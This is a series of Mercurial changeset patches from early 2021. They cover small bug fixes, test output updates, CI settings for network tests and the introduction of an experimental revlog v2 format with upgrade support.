1615397004 -3600 # Wed Mar 10 18:23:24 2021 +0100 # Node ID c7f6c3027af22321edb76a99b79640e53b3db843 # Parent aa2e38147e8b51f0ad9a45cca345fe4c221325d7 remotefilelog: remove unused import This is no longer used since a4c19a162615. Differential Revision: https://phab.mercurial-scm.org/D10152 diff --git a/hgext/remotefilelog/connectionpool.py b/hgext/remotefilelog/connectionpool.py --- a/hgext/remotefilelog/connectionpool.py +++ b/hgext/remotefilelog/connectionpool.py @@ -8,7 +8,6 @@ from __future__ import absolute_import from mercurial import ( - extensions, hg, pycompat, sshpeer, # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615397063 -3600 # Wed Mar 10 18:24:23 2021 +0100 # Node ID 79cfe18c20b52f13e32f0eef97bef0f6a58a8f51 # Parent c7f6c3027af22321edb76a99b79640e53b3db843 test: update expected output in test-http.t The output was introduced in a4c19a162615 and is wrong and unstable. So we glob it as other part of these tests already do. Differential Revision: https://phab.mercurial-scm.org/D10153 diff --git a/tests/test-http.t b/tests/test-http.t --- a/tests/test-http.t +++ b/tests/test-http.t @@ -382,7 +382,7 @@ devel-peer-request: 16 bytes of commands arguments in headers devel-peer-request: finished in *.???? seconds (200) (glob) received listkey for "phases": 15 bytes - (sent 9 HTTP requests and 3898 bytes; received 920 bytes in responses) + (sent 9 HTTP requests and * bytes; received * bytes in responses) (glob) (?) $ hg rollback -q $ sed 's/.*] "/"/' < ../access.log diff --git a/tests/test-lfs-serve.t b/tests/test-lfs-serve.t --- a/tests/test-lfs-serve.t +++ b/tests/test-lfs-serve.t @@ -462,7 +462,7 @@ remote: adding manifests remote: adding file changes remote: added 1 changesets with 1 changes to 1 files - (sent 8 HTTP requests and 3526 bytes; received 961 bytes in responses) (?) + (sent 8 HTTP requests and * bytes; received * bytes in responses) (glob) (?) $ grep 'lfs' .hg/requires $SERVER_REQUIRES .hg/requires:lfs $TESTTMP/server/.hg/requires:lfs # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1615572793 18000 # Fri Mar 12 13:13:13 2021 -0500 # Node ID 6f4a481f182af5005ded9f3eb232dd7c16fa1af3 # Parent 79cfe18c20b52f13e32f0eef97bef0f6a58a8f51 # Parent ed3fb1ae5ab18970dca849233986cad5b3a1c493 merge: with stable diff --git a/.hgsigs b/.hgsigs --- a/.hgsigs +++ b/.hgsigs @@ -207,3 +207,4 @@ 1d5189a57405ceca5aa244052c9f948977f4699b 0 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 diff --git a/.hgtags b/.hgtags --- a/.hgtags +++ b/.hgtags @@ -220,3 +220,4 @@ 1d5189a57405ceca5aa244052c9f948977f4699b 5.6.1 9da65e3cf3706ff41e08b311381c588440c27baf 5.7rc0 0e2e7300f4302b02412b0b734717697049494c4c 5.7 +d5d9177c0045d206db575bae6daa98e2cb2fe5bc 5.7.1 diff --git a/mercurial/filelog.py b/mercurial/filelog.py --- a/mercurial/filelog.py +++ b/mercurial/filelog.py @@ -280,14 +280,12 @@ return super(narrowfilelog, self).size(rev) def cmp(self, node, text): - different = super(narrowfilelog, self).cmp(node, text) + # We don't call `super` because narrow parents can be buggy in case of a + # ambiguous dirstate. Always take the slow path until there is a better + # fix, see issue6150. - # Because renamed() may lie, we may get false positives for - # different content. Check for this by comparing against the original - # renamed() implementation. - if different: - if super(narrowfilelog, self).renamed(node): - t2 = self.read(node) - return t2 != text + # Censored files compare against the empty file. + if self.iscensored(self.rev(node)): + return text != b'' - return different + return self.read(node) != text diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1032,7 +1032,7 @@ incoming.autobuild:run-with-plain = yes # HGPLAIN never set incoming.autobuild:run-with-plain = no - # HGPLAIN inherited from environment (default before Mercurila 5.7) + # HGPLAIN inherited from environment (default before Mercurial 5.7) incoming.autobuild:run-with-plain = auto Most hooks are run with environment variables set that give useful diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -543,7 +543,7 @@ except ValueError as e: # Can be raised on Python 3.8 when path is invalid. raise error.Abort( - _(b'invalid path %s: %s') % (path, pycompat.bytestr(e)) + _(b'invalid path %s: %s') % (path, stringutil.forcebytestr(e)) ) raise error.RepoError(_(b'repository %s not found') % path) @@ -571,7 +571,7 @@ # repository was shared the old way. We check the share source .hg/requires # for SHARESAFE_REQUIREMENT to detect whether the current repository needs # to be reshared - hint = _("see `hg help config.format.use-share-safe` for more information") + hint = _(b"see `hg help config.format.use-share-safe` for more information") if requirementsmod.SHARESAFE_REQUIREMENT in requirements: if ( @@ -1137,7 +1137,7 @@ """File storage when using revlogs.""" def file(self, path): - if path[0] == b'/': + if path.startswith(b'/'): path = path[1:] return filelog.filelog(self.svfs, path) @@ -1148,7 +1148,7 @@ """File storage when using revlogs and narrow files.""" def file(self, path): - if path[0] == b'/': + if path.startswith(b'/'): path = path[1:] return filelog.narrowfilelog(self.svfs, path, self._storenarrowmatch) diff --git a/mercurial/logcmdutil.py b/mercurial/logcmdutil.py --- a/mercurial/logcmdutil.py +++ b/mercurial/logcmdutil.py @@ -876,7 +876,7 @@ # slowpath; otherwise, we can turn off the slowpath if slowpath: for path in match.files(): - if path == b'.' or path in repo.store: + if not path or path in repo.store: break else: slowpath = False diff --git a/mercurial/patch.py b/mercurial/patch.py --- a/mercurial/patch.py +++ b/mercurial/patch.py @@ -20,6 +20,7 @@ from .i18n import _ from .node import ( hex, + nullhex, short, ) from .pycompat import open @@ -3099,12 +3100,12 @@ ctx1, fctx1, path1, flag1, content1, date1 = data1 ctx2, fctx2, path2, flag2, content2, date2 = data2 + index1 = _gitindex(content1) if path1 in ctx1 else nullhex + index2 = _gitindex(content2) if path2 in ctx2 else nullhex if binary and opts.git and not opts.nobinary: text = mdiff.b85diff(content1, content2) if text: - header.append( - b'index %s..%s' % (_gitindex(content1), _gitindex(content2)) - ) + header.append(b'index %s..%s' % (index1, index2)) hunks = ((None, [text]),) else: if opts.git and opts.index > 0: @@ -3114,8 +3115,8 @@ header.append( b'index %s..%s %s' % ( - _gitindex(content1)[0 : opts.index], - _gitindex(content2)[0 : opts.index], + index1[0 : opts.index], + index2[0 : opts.index], _gitmode[flag], ) ) diff --git a/mercurial/pycompat.py b/mercurial/pycompat.py --- a/mercurial/pycompat.py +++ b/mercurial/pycompat.py @@ -510,7 +510,7 @@ # This wrapper file are always open in byte mode. def unnamedtempfile(mode=None, *args, **kwargs): if mode is None: - mode = b'w+b' + mode = 'w+b' else: mode = sysstr(mode) assert 'b' in mode diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -2185,7 +2185,7 @@ global _re2 try: # check if match works, see issue3964 - _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]')) + _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]')) except ImportError: _re2 = False diff --git a/tests/test-diff-unified.t b/tests/test-diff-unified.t --- a/tests/test-diff-unified.t +++ b/tests/test-diff-unified.t @@ -456,3 +456,26 @@ . $ cd .. + +Make sure `hg diff --git` differentiate "file did not exists" and "file is empty" +for git blob oids + + $ hg init bloboids + $ cd bloboids + + $ touch a + $ hg ci -Am "empty a" + adding a + $ hg diff -c 0 --git --config experimental.extendedheader.index=full | grep index + index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 100644 + +Make sure `hg diff --git` differentiate "file was empty" and "file is removed" +for git blob oids + + $ rm a + $ hg ci -Am "removed a" + removing a + $ hg diff -c 1 --git --config experimental.extendedheader.index=full | grep index + index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 100644 + + $ cd .. diff --git a/tests/test-diff-upgrade.t b/tests/test-diff-upgrade.t --- a/tests/test-diff-upgrade.t +++ b/tests/test-diff-upgrade.t @@ -185,7 +185,7 @@ % git=auto: git diff for newbinary diff --git a/newbinary b/newbinary new file mode 100644 - index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..f76dd238ade08917e6712764a16a22005a50573d + index 0000000000000000000000000000000000000000..f76dd238ade08917e6712764a16a22005a50573d GIT binary patch literal 1 Ic${MZ000310RR91 @@ -202,7 +202,7 @@ % git=auto: git diff for rmbinary diff --git a/rmbinary b/rmbinary deleted file mode 100644 - index f76dd238ade08917e6712764a16a22005a50573d..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 + index f76dd238ade08917e6712764a16a22005a50573d..0000000000000000000000000000000000000000 GIT binary patch literal 0 Hc$@<O00001 diff --git a/tests/test-diffstat.t b/tests/test-diffstat.t --- a/tests/test-diffstat.t +++ b/tests/test-diffstat.t @@ -111,7 +111,7 @@ diff --git c c new file mode 100644 - index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..f76dd238ade08917e6712764a16a22005a50573d + index 0000000000000000000000000000000000000000..f76dd238ade08917e6712764a16a22005a50573d GIT binary patch literal 1 Ic${MZ000310RR91 diff --git a/tests/test-git-export.t b/tests/test-git-export.t --- a/tests/test-git-export.t +++ b/tests/test-git-export.t @@ -346,7 +346,7 @@ $ cat b.diff diff --git a/binfile.bin b/binfile.bin new file mode 100644 - index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..37ba3d1c6f17137d9c5f5776fa040caf5fe73ff9 + index 0000000000000000000000000000000000000000..37ba3d1c6f17137d9c5f5776fa040caf5fe73ff9 GIT binary patch literal 593 zc$@)I0<QguP)<h;3K|Lk000e1NJLTq000mG000mO0ssI2kdbIM00009a7bBm000XU diff --git a/tests/test-log-linerange.t b/tests/test-log-linerange.t --- a/tests/test-log-linerange.t +++ b/tests/test-log-linerange.t @@ -1114,7 +1114,7 @@ diff --git a/dir/binary b/dir/binary new file mode 100644 - index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..c2e1fbed209fe919b3f189a6a31950e9adf61e45 + index 0000000000000000000000000000000000000000..c2e1fbed209fe919b3f189a6a31950e9adf61e45 GIT binary patch literal 17 Wc$_QA$SmdpqC~Ew%)G>+N(KNlNClYy diff --git a/tests/test-log.t b/tests/test-log.t --- a/tests/test-log.t +++ b/tests/test-log.t @@ -102,6 +102,41 @@ summary: c +log empty path (or repo root) of slow path shouldn't crash (issue6478) + + $ hg log -ql1 '' inexistent + 4:7e4639b4691b + $ hg log -ql1 . inexistent + 4:7e4639b4691b + $ hg log -ql1 "`pwd`" inexistent + 4:7e4639b4691b + + $ hg log -ql1 '' e + 4:7e4639b4691b + $ hg log -ql1 . e + 4:7e4639b4691b + $ hg log -ql1 "`pwd`" e + 4:7e4639b4691b + +log -f empty path (or repo root) shouldn't crash + + $ hg log -qfl1 '' inexistent + abort: cannot follow file not in parent revision: "inexistent" + [255] + $ hg log -qfl1 . inexistent + abort: cannot follow file not in parent revision: "inexistent" + [255] + $ hg log -qfl1 "`pwd`" inexistent + abort: cannot follow file not in parent revision: "inexistent" + [255] + + $ hg log -qfl1 '' e + 4:7e4639b4691b + $ hg log -qfl1 . e + 4:7e4639b4691b + $ hg log -qfl1 "`pwd`" e + 4:7e4639b4691b + -X, with explicit path $ hg log a -X a diff --git a/tests/test-narrow-shallow.t b/tests/test-narrow-shallow.t --- a/tests/test-narrow-shallow.t +++ b/tests/test-narrow-shallow.t @@ -92,28 +92,8 @@ 1: Commit rev2 of f8, d1/f8, d2/f8 0...: Commit rev2 of f7, d1/f7, d2/f7 -XXX flaky output (see issue6150) -XXX -XXX The filectx implementation is buggy and return wrong data during status. -XXX Leading to more file being "merged". The right output is the one with just -XXX 10 files updated. - $ hg update 4 - merging d2/f1 (?) - merging d2/f2 (?) - merging d2/f3 (?) - merging d2/f4 (?) - merging d2/f5 (?) - merging d2/f6 (?) - merging d2/f7 (?) - 3 files updated, 7 files merged, 0 files removed, 0 files unresolved (?) - 4 files updated, 6 files merged, 0 files removed, 0 files unresolved (?) - 5 files updated, 5 files merged, 0 files removed, 0 files unresolved (?) - 6 files updated, 4 files merged, 0 files removed, 0 files unresolved (?) - 7 files updated, 3 files merged, 0 files removed, 0 files unresolved (?) - 8 files updated, 2 files merged, 0 files removed, 0 files unresolved (?) - 9 files updated, 1 files merged, 0 files removed, 0 files unresolved (?) - 10 files updated, 0 files merged, 0 files removed, 0 files unresolved (?) + 10 files updated, 0 files merged, 0 files removed, 0 files unresolved $ cat d2/f7 d2/f8 d2/f7 rev3 d2/f8 rev2 # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1614283031 -3600 # Thu Feb 25 20:57:11 2021 +0100 # Node ID b41f551c5dc7561e429d57962ad4085ae1438b9e # Parent 6f4a481f182af5005ded9f3eb232dd7c16fa1af3 ci: hook network-io tests into the pipeline This runs the "pip install" tests once for Python 2 and 3 each. Differential Revision: https://phab.mercurial-scm.org/D10075 diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -8,6 +8,7 @@ PYTHON: python TEST_HGMODULEPOLICY: "allow" HG_CI_IMAGE_TAG: "latest" + TEST_HGTESTS_ALLOW_NETIO: "0" .runtests_template: &runtests stage: tests @@ -23,7 +24,7 @@ script: - echo "python used, $PYTHON" - echo "$RUNTEST_ARGS" - - HGMODULEPOLICY="$TEST_HGMODULEPOLICY" "$PYTHON" tests/run-tests.py --color=always $RUNTEST_ARGS + - HGTESTS_ALLOW_NETIO="$TEST_HGTESTS_ALLOW_NETIO" HGMODULEPOLICY="$TEST_HGMODULEPOLICY" "$PYTHON" tests/run-tests.py --color=always $RUNTEST_ARGS .rust_template: &rust @@ -69,6 +70,7 @@ variables: RUNTEST_ARGS: " --no-rust --blacklist /tmp/check-tests.txt" TEST_HGMODULEPOLICY: "c" + TEST_HGTESTS_ALLOW_NETIO: "1" test-py3: <<: *runtests @@ -76,6 +78,7 @@ RUNTEST_ARGS: " --no-rust --blacklist /tmp/check-tests.txt" PYTHON: python3 TEST_HGMODULEPOLICY: "c" + TEST_HGTESTS_ALLOW_NETIO: "1" test-py2-pure: <<: *runtests # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1613175214 28800 # Fri Feb 12 16:13:34 2021 -0800 # Node ID 7ed7b13fc00a6478a448a30c0b5e7ec1df2c7f84 # Parent b41f551c5dc7561e429d57962ad4085ae1438b9e rebase: inline simple function for finding obsolete subset of commits `_filterobsoleterevs()` is just one line long. It was introduced in 2d294dada4f8 (rebase: small refactoring to allow better extensibility from extensions, 2016-01-14), for use by the "inhibit" extension. That extension was removed from the evolve repo in 87e87881059d (compat: drop the inhibit hacky extension, 2017-10-24). Differential Revision: https://phab.mercurial-scm.org/D10198 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -474,7 +474,7 @@ ) # Calculate self.obsoletenotrebased - obsrevs = _filterobsoleterevs(self.repo, self.state) + obsrevs = {r for r in self.state if self.repo[r].obsolete()} self._handleskippingobsolete(obsrevs, self.destmap) # Keep track of the active bookmarks in order to reset them later @@ -2184,11 +2184,6 @@ return ret -def _filterobsoleterevs(repo, revs): - """returns a set of the obsolete revisions in revs""" - return {r for r in revs if repo[r].obsolete()} - - def _computeobsoletenotrebased(repo, rebaseobsrevs, destmap): """Return (obsoletenotrebased, obsoletewithoutsuccessorindestination). # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1611844137 -3600 # Thu Jan 28 15:28:57 2021 +0100 # Node ID 913485776542596c95995f6bd0495654eb76bff9 # Parent 7ed7b13fc00a6478a448a30c0b5e7ec1df2c7f84 revlog: introduce v2 format As documented in [1], this is still tentative and could be subject to change, but we need to lay down the foundations in order to work on the next abstraction layers. [1] https://www.mercurial-scm.org/wiki/RevlogV2Plan Differential Revision: https://phab.mercurial-scm.org/D9843 diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -233,10 +233,61 @@ return self._offsets[i] -def parse_index2(data, inline): +def parse_index2(data, inline, revlogv2=False): if not inline: - return IndexObject(data), None - return InlinedIndexObject(data, inline), (0, data) + cls = IndexObject2 if revlogv2 else IndexObject + return cls(data), None + cls = InlinedIndexObject2 if revlogv2 else InlinedIndexObject + return cls(data, inline), (0, data) + + +class Index2Mixin(object): + # 6 bytes: offset + # 2 bytes: flags + # 4 bytes: compressed length + # 4 bytes: uncompressed length + # 4 bytes: base rev + # 4 bytes: link rev + # 4 bytes: parent 1 rev + # 4 bytes: parent 2 rev + # 32 bytes: nodeid + # 8 bytes: sidedata offset + # 4 bytes: sidedata compressed length + # 20 bytes: Padding to align to 96 bytes (see RevlogV2Plan wiki page) + index_format = b">Qiiiiii20s12xQi20x" + index_size = struct.calcsize(index_format) + assert index_size == 96, index_size + null_item = (0, 0, 0, -1, -1, -1, -1, nullid, 0, 0) + + +class IndexObject2(Index2Mixin, IndexObject): + pass + + +class InlinedIndexObject2(Index2Mixin, InlinedIndexObject): + def _inline_scan(self, lgt): + sidedata_length_pos = 72 + off = 0 + if lgt is not None: + self._offsets = [0] * lgt + count = 0 + while off <= len(self._data) - self.index_size: + start = off + self.big_int_size + (data_size,) = struct.unpack( + b'>i', + self._data[start : start + self.int_size], + ) + start = off + sidedata_length_pos + (side_data_size,) = struct.unpack( + b'>i', self._data[start : start + self.int_size] + ) + if lgt is not None: + self._offsets[count] = off + count += 1 + off += self.index_size + data_size + side_data_size + if off != len(self._data): + raise ValueError(b"corrupted data") + return count def parse_index_devel_nodemap(data, inline): diff --git a/mercurial/requirements.py b/mercurial/requirements.py --- a/mercurial/requirements.py +++ b/mercurial/requirements.py @@ -30,7 +30,7 @@ # Increment the sub-version when the revlog v2 format changes to lock out old # clients. -REVLOGV2_REQUIREMENT = b'exp-revlogv2.1' +REVLOGV2_REQUIREMENT = b'exp-revlogv2.2' # A repository with the sparserevlog feature will have delta chains that # can spread over a larger span. Sparse reading cuts these large spans into diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -83,6 +83,7 @@ storageutil, stringutil, ) +from .pure import parsers as pureparsers # blanked usage of all the name to prevent pyflakes constraints # We need these name available in the module for extensions. @@ -364,6 +365,25 @@ return p +indexformatv2 = struct.Struct(pureparsers.Index2Mixin.index_format) +indexformatv2_pack = indexformatv2.pack + + +class revlogv2io(object): + def __init__(self): + self.size = indexformatv2.size + + def parseindex(self, data, inline): + index, cache = parsers.parse_index2(data, inline, revlogv2=True) + return index, cache + + def packentry(self, entry, node, version, rev): + p = indexformatv2_pack(*entry) + if rev == 0: + p = versionformat_pack(version) + p[4:] + return p + + NodemapRevlogIO = None if util.safehasattr(parsers, 'parse_index_devel_nodemap'): @@ -650,6 +670,8 @@ self._io = revlogio() if self.version == REVLOGV0: self._io = revlogoldio() + elif fmt == REVLOGV2: + self._io = revlogv2io() elif devel_nodemap: self._io = NodemapRevlogIO() elif use_rust_index: @@ -2337,7 +2359,13 @@ p1r, p2r, node, + 0, + 0, ) + + if self.version & 0xFFFF != REVLOGV2: + e = e[:8] + self.index.append(e) entry = self._io.packentry(e, self.node, self.version, curr) diff --git a/mercurial/revlogutils/constants.py b/mercurial/revlogutils/constants.py --- a/mercurial/revlogutils/constants.py +++ b/mercurial/revlogutils/constants.py @@ -15,7 +15,6 @@ REVLOGV0 = 0 REVLOGV1 = 1 # Dummy value until file format is finalized. -# Reminder: change the bounds check in revlog.__init__ when this is changed. REVLOGV2 = 0xDEAD # Shared across v1 and v2. FLAG_INLINE_DATA = 1 << 16 diff --git a/tests/test-parseindex2.py b/tests/test-parseindex2.py --- a/tests/test-parseindex2.py +++ b/tests/test-parseindex2.py @@ -117,8 +117,8 @@ ) -def parse_index2(data, inline): - index, chunkcache = parsers.parse_index2(data, inline) +def parse_index2(data, inline, revlogv2=False): + index, chunkcache = parsers.parse_index2(data, inline, revlogv2=revlogv2) return list(index), chunkcache diff --git a/tests/test-revlog-v2.t b/tests/test-revlog-v2.t --- a/tests/test-revlog-v2.t +++ b/tests/test-revlog-v2.t @@ -22,7 +22,7 @@ $ cd empty-repo $ cat .hg/requires dotencode - exp-revlogv2.1 + exp-revlogv2.2 fncache sparserevlog store diff --git a/tests/test-revlog.t b/tests/test-revlog.t --- a/tests/test-revlog.t +++ b/tests/test-revlog.t @@ -22,10 +22,10 @@ Unknown version is rejected >>> with open('.hg/store/00changelog.i', 'wb') as fh: - ... fh.write(b'\x00\x00\x00\x02') and None + ... fh.write(b'\x00\x00\xbe\xef') and None $ hg log - abort: unknown version (2) in revlog 00changelog.i + abort: unknown version (48879) in revlog 00changelog.i [50] $ cd .. # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1611173646 -3600 # Wed Jan 20 21:14:06 2021 +0100 # Node ID fd55a9eb1507dfa787e8b4ef95b3bda9fe178e0b # Parent 913485776542596c95995f6bd0495654eb76bff9 revlogv2: allow upgrading to v2 Revlogv2 implies sidedata. Right now sidedata is not really used in production, and Revlogv2 will be used for the first production-ready version of sidedata support. Differential Revision: https://phab.mercurial-scm.org/D9844 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -1299,6 +1299,12 @@ ) coreconfigitem( b'format', + b'exp-revlogv2.2', + default=False, + experimental=True, +) +coreconfigitem( + b'format', b'exp-use-copies-side-data-changeset', default=False, experimental=True, diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -3447,9 +3447,13 @@ # experimental config: format.exp-use-side-data if ui.configbool(b'format', b'exp-use-side-data'): + requirements.discard(requirementsmod.REVLOGV1_REQUIREMENT) + requirements.add(requirementsmod.REVLOGV2_REQUIREMENT) requirements.add(requirementsmod.SIDEDATA_REQUIREMENT) # experimental config: format.exp-use-copies-side-data-changeset if ui.configbool(b'format', b'exp-use-copies-side-data-changeset'): + requirements.discard(requirementsmod.REVLOGV1_REQUIREMENT) + requirements.add(requirementsmod.REVLOGV2_REQUIREMENT) requirements.add(requirementsmod.SIDEDATA_REQUIREMENT) requirements.add(requirementsmod.COPIESSDC_REQUIREMENT) if ui.configbool(b'experimental', b'treemanifest'): @@ -3457,7 +3461,7 @@ revlogv2 = ui.config(b'experimental', b'revlogv2') if revlogv2 == b'enable-unstable-format-and-corrupt-my-data': - requirements.remove(requirementsmod.REVLOGV1_REQUIREMENT) + requirements.discard(requirementsmod.REVLOGV1_REQUIREMENT) # generaldelta is implied by revlogv2. requirements.discard(requirementsmod.GENERALDELTA_REQUIREMENT) requirements.add(requirementsmod.REVLOGV2_REQUIREMENT) diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -328,7 +328,7 @@ class sidedata(requirementformatvariant): name = b'sidedata' - _requirement = requirements.SIDEDATA_REQUIREMENT + _requirement = requirements.REVLOGV2_REQUIREMENT default = False @@ -339,6 +339,11 @@ upgrademessage = _(b'Allows storage of extra data alongside a revision.') + @classmethod + def fromrepo(cls, repo): + assert cls._requirement is not None + return cls._requirement in repo.requirements + @registerformatvariant class persistentnodemap(requirementformatvariant): @@ -371,6 +376,15 @@ @registerformatvariant +class revlogv2(requirementformatvariant): + name = b'revlog-v2' + _requirement = requirements.REVLOGV2_REQUIREMENT + default = False + description = _(b'Version 2 of the revlog.') + upgrademessage = _(b'very experimental') + + +@registerformatvariant class removecldeltachain(formatvariant): name = b'plain-cl-delta' @@ -857,8 +871,6 @@ """ return { # Introduced in Mercurial 0.9.2. - requirements.REVLOGV1_REQUIREMENT, - # 